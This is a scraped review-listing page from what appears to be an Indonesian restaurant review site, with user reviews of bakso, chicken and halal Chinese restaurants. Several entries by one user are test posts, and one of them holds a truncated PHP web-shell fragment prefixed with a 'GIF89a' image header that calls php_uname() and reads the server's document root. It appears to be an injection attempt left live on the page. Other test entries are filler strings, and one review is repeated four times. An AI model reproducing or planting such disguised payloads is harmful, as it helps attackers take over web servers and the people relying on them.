• Home » User Review »

      • Latest User Review
        Total Review: 4556
        Ikan Bali Jimbaran 2
        tomer123 : test
        aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ...
        Ikan Bali Jimbaran 2
        tomer123 : test
        GIF89a; Exilie's

        "; echo "".php_uname()."
        "; echo "
        "; $root = $_SERVER['DOCUMENT_ROOT']; ...
        Ikan Bali Jimbaran 2
        tomer123 : test
        test sssssssssssssssssssssssssssssssssss sssss sssssssssssss ssssssssssssssss sssssssssssssssssssssssssssssssssssssssssss ssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssss sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss ...
        Bakso Jakarta
        BaksoJakarta : Menu terfavorit di bakso Jakarta yaitu bakso ENAK AJA
        Seporsi bakso dengan isi 8 butir bakso dan berbagai varian rasa!!! Makan satu porsi bakso doang bikin kenyang! Terdapat isi bakso jagung, smoke, keju, kornet, cabe, urat dan halus. Bakso favorit aku isi keju, karena isi keju nya banyak banget dan berasa banget loh!!! ...
        Rumah Makan Ayam Bawel
        ayambawel : Mau Makan Enak??? ya datang saja ke RM. Ayam Bawel
        Mau makan makanan yang enak hanya ada di RM. Ayam Bawel, Jl. Raya Ciater Barat No. 54 (Depan Taman Hias Terusan Viktor Raya BSD Serpong). Pemesanan bisa melalui Go-Food atau datang trus atur janji datang melalui wa 085692122658 oscar. website : ayambawel.weebly.com ...
        Hahala (Specialist Shao Kao & Ma La Tang restaurant)
        allyssa18 : Makanan Halal dan Enak
        Ada gak sih Restoran Chinese yang Halal dan enak di Jakarta Barat? Soalnya, aku tinggal di daerah yang mayoritasnya penduduknya Keturunan etnis Tionghoa. setelah muter muter cari tempat makan yang cocok ternyata ada Restoran Chinese yang menyajikan makanan 100 % hahal yaitu Hahala Resto posisinya juga ...
        Hahala (Specialist Shao Kao & Ma La Tang restaurant)
        allyssa18 : Restoran Chinese yang Halal
        Tadinya aku berfikiran ada gak ya Restoran Chinese yang halal, soalnya aku tinggal hampir semuanya orang chinese. Setelah cari cari ternyata ada restoran chinese yang 100 % halal, yaitu Hahala Resto. Makanannya enak enak, ya walaupun awalnya aneh sih denger kata shaokao dan malatang. Shaokao itu sate ...
        Hahala (Specialist Shao Kao & Ma La Tang restaurant)
        allyssa18 : Restoran Chinese yang Halal
        Tadinya aku berfikiran ada gak ya Restoran Chinese yang halal, soalnya aku tinggal hampir semuanya orang chinese. Setelah cari cari ternyata ada restoran chinese yang 100 % halal, yaitu Hahala Resto. Makanannya enak enak, ya walaupun awalnya aneh sih denger kata shaokao dan malatang. Shaokao itu sate ...
        Hahala (Specialist Shao Kao & Ma La Tang restaurant)
        allyssa18 : Restoran Chinese yang Halal
        Tadinya aku berfikiran ada gak ya Restoran Chinese yang halal, soalnya aku tinggal hampir semuanya orang chinese. Setelah cari cari ternyata ada restoran chinese yang 100 % halal, yaitu Hahala Resto. Makanannya enak enak, ya walaupun awalnya aneh sih denger kata shaokao dan malatang. Shaokao itu sate ...
        Hahala (Specialist Shao Kao & Ma La Tang restaurant)
        allyssa18 : Restoran Chinese yang Halal
        Tadinya aku berfikiran ada gak ya Restoran Chinese yang halal, soalnya aku tinggal hampir semuanya orang chinese. Setelah cari cari ternyata ada restoran chinese yang 100 % halal, yaitu Hahala Resto. Makanannya enak enak, ya walaupun awalnya aneh sih denger kata shaokao dan malatang. Shaokao itu sate ...